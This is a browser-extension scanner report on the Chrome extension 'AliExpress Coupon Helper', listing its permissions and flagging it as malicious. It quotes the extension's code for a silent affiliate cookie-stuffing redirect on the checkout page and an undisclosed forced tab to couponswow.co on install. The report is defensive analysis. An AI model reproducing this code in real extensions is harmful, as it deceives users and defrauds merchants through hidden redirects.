AliExpress Coupon Helper

AliExpress Coupon Helper

ID: lmdbmdjlmfenbdkgfhboiedhdphbojao

Supported Languages

🇺🇸English

Extension Info & Metadata

Status
Active
Version
2.3.1
Size
0.00 MB
Rating
4.3/5
Reviews
6
Users
336
Type
Extension
Updated
Dec 31, 2025
Category
Shopping
Price
Free
Featured
No
Visibility
Listed
Mature
No
By Google
No
Trusted
No

Publisher Contextual Analysis

Trusted
Author
steals.ccView Profile
MX records exist
Yes
Domain exists
Yes
Is disposable
No
Is role-based
No
Mailbox exists
Yes
Website
Visit
Total Extensions
1
Active
1
Obsolete
0
Listed
1
Unlisted
0
Total Users
336
Screenshot 1
Screenshot 2
Screenshot 3
Screenshot 4

Find hidden coupons and deals on AliExpress. Save money with automatic coupon discovery.

Coupon Helper brings you a brand new Chrome extension that will search for available coupons and discounts offered by AliExpress sellers whilst you are browsing the store. This personal shopping assistant will ensure you save a few dollars and get the best deals every time you make purchase in AliExpress. Just install the extension and it will automatically start searching for the best coupons and discounts available for each product in AliExpress. When an offer is detected an orange box will appear with instructions on how to grab it. This extension also works with your wishlist! If you were to find multiple products with the same price, you can add them to your wishlist and occasionally check with AliExpress Coupon Finder to see if a vendor has released a coupon or a discount. We won’t lie, AliExpress’ coupons and discounts can be a bit confusing and hard to understand, it is for this reason why many people don’t take full advantage of them. However, thanks to this free extension you will be able to save a few dollars on many of your purchases, especially on the products that are in the medium to high price range (there are usually not many discounts or coupons available for extremely cheap products). Extension options: You can customize the extension to cover your exclusive shopping needs. If you do not need the extension to automatically search for coupons and discounts each time you browse through AliExpress, you have the option of turning off the automatic search function in the menu bar (click on the orange coupon toolbar) and then simply click on the Right Button> Check coupons for this product, and extension will only look at the products you choose. Coupon Finder brings you a brand new Chrome extension that will search for available coupons and discounts offered by AliExpress sellers… If you are browsing through a store, and you do not need AliExpress Coupon Finder to search for discounts for all the products the seller offers, you can disable this function unchecking on "Enabled on stores” in the menu. It is not uncommon that while browsing you will see an alert saying "There are coupons or discounts for bigger amounts". This happens when you are before a product that costs, lets say $10 but the seller will only give a discount if, for example, you spend $20. You can also customize the extension and disable this notification by deselecting "Disable alert when coupons or discounts are for bigger amounts." Enjoy!

Item
Type
Severity
Description
Contextual Risk Factors
Risk Factor
High
The following context increases the overall risk:• 15% increase: Older manifest version lacks modern security controls
activeTab
Permission
Medium
This permission grants temporary access to the current tab. Rated Medium because it can access current page content when invoked, though limited to user-initiated actions.
tabs
Permission
Medium
This permission enables tab management and monitoring. Rated Medium because it can track open tabs, access tab metadata, and monitor user browsing patterns.
Older Manifest Version
Risk Factor
Medium
This extension uses Manifest Version 2
http://*/*
Permission
Unknown
No classification available for this permission.
https://*/*
Permission
Unknown
No classification available for this permission.

When the user reaches AliExpress's order-confirmation page (`confirm_order.htm`), the content script silently triggers a tab redirect through the publisher's personal affiliate link (`aff_short_key=FaQbeq7`), appending the user's real destination as the deep-link target. This injects an affiliate tracking cookie at the moment of purchase without the user's awareness or consent — a textbook affiliate cookie-stuffing attack. The extension description makes no mention of affiliate commissions or redirects; the behaviour is entirely undisclosed.

content.js (Line 1)
var pattern = /\bconfirm_order.htm/;var pattern2 = /\b&x=1/;var viewtext_base_url = "http://s.click.aliexpress.com/deep_link.htm?aff_short_key=FaQbeq7&dl_target_url=";var newurl;if (pattern.test(window.document.URL) && !pattern2.test(window.document.URL)) // if it matches pattern defined above{  newurl = viewtext_base_url + encodeURIComponent(window.location.href + "&x=1");  chrome.extension.sendRequest({    redirect: newurl  }); // send message to redirect}

On first install the extension immediately opens `couponswow.co` in a new tab without any user interaction, acting as an ad/affiliate landing page drive. The same domain is also set as the uninstall URL so the publisher captures traffic on removal too. Neither behaviour is disclosed in the CWS listing and neither is related to coupon discovery.

background.js (Line 7)
chrome.runtime.onInstalled.addListener(function(details) {  if (details.reason != "install") return;  chrome.runtime.setUninstallURL("http://www.couponswow.co/");  chrome.tabs.create({    url: "http://www.couponswow.co/"  });  //ga('send', 'event', 'AlixCoupon', 'install', 'install');});

By severity

Critical0
High1
Medium1
Low0

Versions scanned

Showing 1 of 1 scanned version with more than one unique finding. Counts are unique findings that include each version.

Extension VersionCode Review Findings
2.3.12

Files with findings

2 distinct paths — top paths by unique finding count:

  • background.js1
  • content.js1
S.No.
Category
Severity
File
Summary
Found in Version
1Tracking
high
content.js (line 1)When the user reaches AliExpress's order-confirmation page (`confirm_order.htm`), the content script silently triggers a tab redirect through the publisher's personal affiliate link (`aff_short_key=FaQbeq7`), appendin…
2Other
medium
background.js (line 7)On first install the extension immediately opens `couponswow.co` in a new tab without any user interaction, acting as an ad/affiliate landing page drive. The same domain is also set as the uninstall URL so the publish…
URLs
6
IPv4
0
IPv6
0

URLs

View the external URLs this extension communicates with to understand its network activity and data interactions.

Gain full insight into all external connections.

Upgrade for full visibility.

www.couponswow.co-http://www.couponswow.co/
s.click.aliexpress.com/deep_link.htmhttp://s.click.aliexpress.com/deep_link.htm?aff_short_key=FaQbeq7&dl_target_url=
clients2.google.com/service/update2/crxhttps://clients2.google.com/service/update2/crx
ssl.google-analytics.com/;https://ssl.google-analytics.com/;
*/*http://*/*
*/*https://*/*

Gain full insight into all external connections.

Upgrade for full visibility.

No IP addresses found
Version
Size
Is Malicious
Findings
Permhash
2.3.1
Latest
0.00 MB
Malicious
2
Showing 1 to 1 of 10 rows
Rows per page:

Browse and explore files within this extension package

Gain full insight into all external connections.

Upgrade for full visibility.